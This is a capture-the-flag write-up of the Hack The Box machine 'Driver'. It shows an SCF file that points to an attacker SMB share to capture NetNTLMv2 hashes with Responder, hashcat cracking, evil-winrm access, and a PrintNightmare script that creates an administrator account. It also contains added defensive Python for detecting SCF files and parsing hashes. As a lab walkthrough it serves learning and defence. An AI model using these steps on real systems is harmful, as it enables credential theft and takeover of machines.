Enumeration
NMAP
┌──(root💀kali)-[~]
└─# nmap -sV -sC -T4 -p- -v 10.10.11.106
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2021-11-18T18:20:53
|_ start_date: 2021-11-18T18:12:04
|_clock-skew: mean: 7h04m58s, deviation: 0s, median: 7h04m58s
SMB and NetNTLMv2 hash grabbing
There is an HTTP service running on driver.htb on port 80. It asks for HTTP basic authentication (username:password) when I try to access it. I tried default credentials such as admin:password and admin:admin, which got me in.

It seems there is an upload function. I tried to upload a reverse shell, but I could not find any directory where the uploaded files end up, and no LFI was available either. I then looked at the other services: since SMB (file sharing) is present, perhaps it could somehow be used to get a reverse shell, and I found this awesome post: https://sql–injection.blogspot.com/p/smb.html
In our case we have to create the file, find a way to upload it, and capture the resulting authentication attempt against our own share with Responder.
┌──(root💀kali)-[~]
└─# cat steal-hash.scf
[Shell]
Command=2
IconFile=\\10.10.14.7\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
┌──(root💀kali)-[~]
└─# responder --lm -v -I tun0
[+] Listening for events...
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>
[SMB] NTLMv2 Hash : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
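As an added defender-side example (not part of the original post), the following Python check parses an SCF file like the one above and flags an IconFile that is a UNC path to a host outside a trusted range, which is how an upload handler or a share scanner could catch this trick before Explorer ever renders the folder. The 10.10.11.0/24 range and both sample files are assumptions constructed for the example.

```python
import configparser
import ipaddress
import re

# Constructed sample in the layout of the SCF file shown above (not the post's own file).
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.14.7\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
"""

# A benign SCF whose icon comes from a local system DLL, for comparison (also constructed).
BENIGN_SCF = r"""[Shell]
Command=2
IconFile=%SystemRoot%\system32\SHELL32.dll,3
[Taskbar]
Command=ToggleDesktop
"""

# Assumption: file servers that may legitimately host icons live in this range.
TRUSTED_NETS = [ipaddress.ip_network("10.10.11.0/24")]

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")  # captures the host part of \\host\share\...

def extract_unc_host(scf_text):
    """Return the host named in [Shell] IconFile if it is a UNC path, else None."""
    cp = configparser.ConfigParser(interpolation=None)  # SCF is INI-style; '%' must stay literal
    cp.read_string(scf_text)
    icon = cp.get("Shell", "IconFile", fallback="")
    m = UNC_RE.match(icon.strip())
    return m.group(1) if m else None

def is_trusted_host(host):
    """Only literal addresses inside TRUSTED_NETS count as trusted; names are not resolved."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)

def classify_scf(scf_text):
    """'local-icon': no UNC icon; 'trusted-unc': UNC to a trusted host; 'suspicious-unc': rest.
    Explorer fetches the icon when listing the folder, so a suspicious-unc file on a share
    makes every browsing user authenticate (NTLM) to that host."""
    host = extract_unc_host(scf_text)
    if host is None:
        return "local-icon"
    return "trusted-unc" if is_trusted_host(host) else "suspicious-unc"
```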
Analyse the hash with hashid in order to confirm its type.
┌──(root💀kali)-[~]
└─# cat to-crack.hash
<EDITED>
┌──(root💀kali)-[~]
└─# hashid to-crack.hash
--File 'to-crack.hash'--
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
--End of file 'to-crack.hash'--
The hash is NetNTLMv2. Now we have to crack it with hashcat.
┌──(root💀kali)-[~]
└─# hashcat --help |grep NetNTLMv2
5600 | NetNTLMv2 | Network Protocols
┌──(root💀kali)-[~]
└─# hashcat -a 0 -m 5600 to-crack.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: to-crack.hash
................................
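To see what hashid is recognising here, this added Python parser (written for this write-up, not code from the post, Responder or hashcat) splits a line in Responder's NetNTLMv2 output format into its fields and decodes the client blob's timestamp and NetBIOS names per MS-NLMP, which is useful when triaging such a capture. The sample line is constructed from the user and host names seen in the post with placeholder bytes for the challenge and proof.

```python
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ticks):
    """FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)

def parse_netntlmv2(line):
    """Split a Responder/hashcat (mode 5600) line into its parts.
    Layout: USER::DOMAIN:ServerChallenge(16 hex):NTProofStr(32 hex):NTLMv2ClientBlob(hex)."""
    user, empty, domain, server_chal, proof, blob_hex = line.strip().split(":", 5)
    if empty != "" or len(server_chal) != 16 or len(proof) != 32:
        raise ValueError("not in NetNTLMv2 format")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("unexpected NTLMv2_CLIENT_CHALLENGE header")
    (ticks,) = struct.unpack_from("<Q", blob, 8)   # TimeStamp field
    client_chal = blob[16:24]                      # ChallengeFromClient
    av_pairs, off = {}, 28                         # AvPairs start after 4 reserved bytes
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:                             # MsvAvEOL terminates the list
            break
        av_pairs[av_id] = blob[off:off + av_len]
        off += av_len
    return {
        "user": user, "domain": domain, "server_challenge": server_chal, "nt_proof": proof,
        "client_time": filetime_to_datetime(ticks), "client_challenge": client_chal.hex(),
        "netbios_computer": av_pairs.get(1, b"").decode("utf-16-le"),  # MsvAvNbComputerName
        "netbios_domain": av_pairs.get(2, b"").decode("utf-16-le"),    # MsvAvNbDomainName
    }

def build_sample_line():
    """Constructed sample (not a real capture): names from the post, placeholder bytes elsewhere."""
    delta = datetime(2021, 11, 18, 18, 20, 53, tzinfo=timezone.utc) - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10_000_000
    name = "DRIVER".encode("utf-16-le")
    av = struct.pack("<HH", 1, len(name)) + name + struct.pack("<HH", 2, len(name)) + name + b"\x00" * 4
    blob = b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", ticks) + bytes(range(8)) + b"\x00" * 4 + av + b"\x00" * 4
    return "tony::DRIVER:" + "11" * 8 + ":" + "22" * 16 + ":" + blob.hex()
```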
smbmap
┌──(root💀kali)-[~]
└─# smbmap -H 10.10.11.106 -u <EDITED> -p '<EDITED>'
[+] IP: 10.10.11.106:445 Name: driver.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Foothold
Nice post about evil-winrm: https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md
Our enumeration discovered another open port: 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP).
## Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.
This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting.
It is based mainly on the WinRM Ruby library, which changed the way it works since version 2.0. Instead of using the WinRM protocol, it now uses PSRP (PowerShell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.
Now that we have some understanding of the tool and we have credentials, we can proceed to getting a foothold.
┌──(root💀kali)-[~]
└─# evil-winrm
Evil-WinRM shell v3.3
Error: missing argument: ip, user
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u <EDITED> -p '<EDITED>'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
Windows Recon
This page is amazing and provides plenty of information on the Windows recon phase.
https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md#post-exploitation
- winPEAS.exe
## Basic information
The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the last checks searching for known filenames** that could contain passwords (the time depends on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched; you can use the **searchall** parameter to search the whole list (this could add some minutes).
To enable colored version of winPEAS change the registry key value:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.
Analysing the massive output winPEAS produces, I discover the spoolsv service running on the local computer. I remember from previous machines that spoolsv is the print spooler service. Among other findings, I decided to proceed with this one since a possible exploit is well documented here: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 712 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 448 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 1188 spoolsv
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 816 svchost
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 568 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 576 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 5985 10.10.14.7 47132 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.7 47134 Established 4 System
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP [::] 80 [::] 0 Listening 4 System
TCP [::] 135 [::] 0 Listening 712 svchost
TCP [::] 445 [::] 0 Listening 4 System
TCP [::] 5985 [::] 0 Listening 4 System
TCP [::] 47001 [::] 0 Listening 4 System
TCP [::] 49408 [::] 0 Listening 448 wininit
TCP [::] 49409 [::] 0 Listening 868 svchost
TCP [::] 49410 [::] 0 Listening 1188 spoolsv
TCP [::] 49411 [::] 0 Listening 816 svchost
TCP [::] 49412 [::] 0 Listening 568 services
TCP [::] 49413 [::] 0 Listening 576 lsass
Privilege Escalation
Download the exploit file to your local Kali machine.
┌──(root💀kali)-[/opt]
└─# git clone https://github.com/calebstewart/CVE-2021-1675
I renamed the file to print-nightmare.ps1 and uploaded it to the victim machine as follows:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> upload /opt/print-nightmare/print-nightmare.ps1
Info: Uploading /opt/print-nightmare/print-nightmare.ps1 to C:\Users\tony\Documents\print-nightmare.ps1
Data: 238080 bytes of 238080 bytes copied
Info: Upload successful!
I import the script but receive the following error, because the execution policy registry key is not set:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
File C:\Users\<EDITED>\Documents\print-nightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module ./print-nightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
To fix this, I set the execution policy to Unrestricted:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Restricted
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Unrestricted
Creating an administrator user:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
Logging in as the newly created user:
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u 0xdf -p '0xdf0xdf'
*Evil-WinRM* PS C:\Users\0xdf\Documents> whoami
driver\0xdf
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4bc<EDITED>
I think this machine is really not realistic. Is it a printer? Is it a client? How can I expect an SCF file to be executed automatically by a user when I upload it as a printer driver? That just doesn’t make sense and would not appear like this in the real world…
If you think you want real-world examples, you should go for some of the more advanced ones. This box is really easy.